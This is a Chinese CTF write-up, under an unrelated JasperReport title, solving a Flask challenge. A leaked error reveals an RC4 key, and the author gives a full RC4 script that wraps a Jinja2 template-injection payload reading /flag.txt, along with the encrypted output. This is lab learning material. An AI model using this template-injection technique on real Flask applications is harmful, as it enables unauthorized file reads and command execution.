JasperReport使用Collection of JavaBeans建立報表
阿新 • • 發佈:2020-07-18
0x01
進入頁面如下
提示我們尋找secret,再加上題目的提示,猜測這裡有secret頁面,我們嘗試訪問,結果如下
根據它這個話的意思,是讓我們傳參,然後它會給你加密,我們試一下
發現輸入的1變成了d,我們嘗試增加輸入引數的長度,然後就出現了下圖的結果
報錯了,直接原始碼洩露,然後我們看一下標記處
0x02
程式碼如下:
File "/app/app.py", line 35, in secret if(secret==None): return 'Tell me your secret.I will encrypt it so others can\'t see' rc=rc4_Modified.RC4("HereIsTreasure") #解密 deS=rc.do_crypt(secret) a=render_template_string(safe(deS)) if 'ciscn' in a.lower(): return 'flag detected!' return a
這裡其實就是對我們輸入引數的一個判斷,首先判斷你是不是為空,如果是空的引數,則返回一段話,就是我們剛進頁面看到的內容,如果你傳入了引數,那麼它就會進行加密,可以看到是RC4加密,而且還洩露了金鑰,金鑰就是“HereIsTreasure”,而且通過報錯,我們瞭解到這是flask的模板,而且python的版本是2.7的,那麼我們可以利用flask的模板注入,執行命令,只不過需要進行RC4加密。
RC4加密指令碼:
import base64 from urllib.parse import quote def rc4_main(key = "init_key", message = "init_message"): # print("RC4加密主函式") s_box = rc4_init_sbox(key) crypt = str(rc4_excrypt(message, s_box)) return crypt def rc4_init_sbox(key): s_box = list(range(256)) # print("原來的 s 盒:%s" % s_box) j = 0 for i in range(256): j = (j + s_box[i] + ord(key[i % len(key)])) % 256 s_box[i], s_box[j] = s_box[j], s_box[i] # print("混亂後的 s 盒:%s"% s_box) return s_box def rc4_excrypt(plain, box): # print("呼叫加密程式成功。") res = [] i = j = 0 for s in plain: i = (i + 1) % 256 j = (j + box[i]) % 256 box[i], box[j] = box[j], box[i] t = (box[i] + box[j]) % 256 k = box[t] res.append(chr(ord(s) ^ k)) cipher = "".join(res) print("加密後的字串是:%s" %quote(cipher)) return (str(base64.b64encode(cipher.encode('utf-8')), 'utf-8')) rc4_main("HereIsTreasure","{{''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/flag.txt').read()}}")
加密後的字串為
.%14%1E%12%C3%A484mg%C2%9C%C3%8B%00%C2%81%C2%8D%C2%B8%C2%97%0B%C2%9EF%3B%C2%88m%C2%AEM5%C2%96%3D%C2%9D%5B%C3%987%C3%AA%12%C2%B4%05%C2%84A%C2%BF%17%C3%9Bh%C3%8F%C2%8F%C3%A1a%0F%C2%AE%09%C2%A0%C2%AEyS%2A%C2%A2d%7C%C2%98/%00%C2%90%C3%A9%03Y%C2%B2%C3%9B%1F%C2%B6H%3D%0A%23%C3%B1%5B%C2%9Cp%C2%AEn%C2%96i%5Dv%7FX%C2%92
然後我們傳入,得到如下結果
拿到flag
總結
主要就是用到了flask模板命令執行,配合了RC4的加密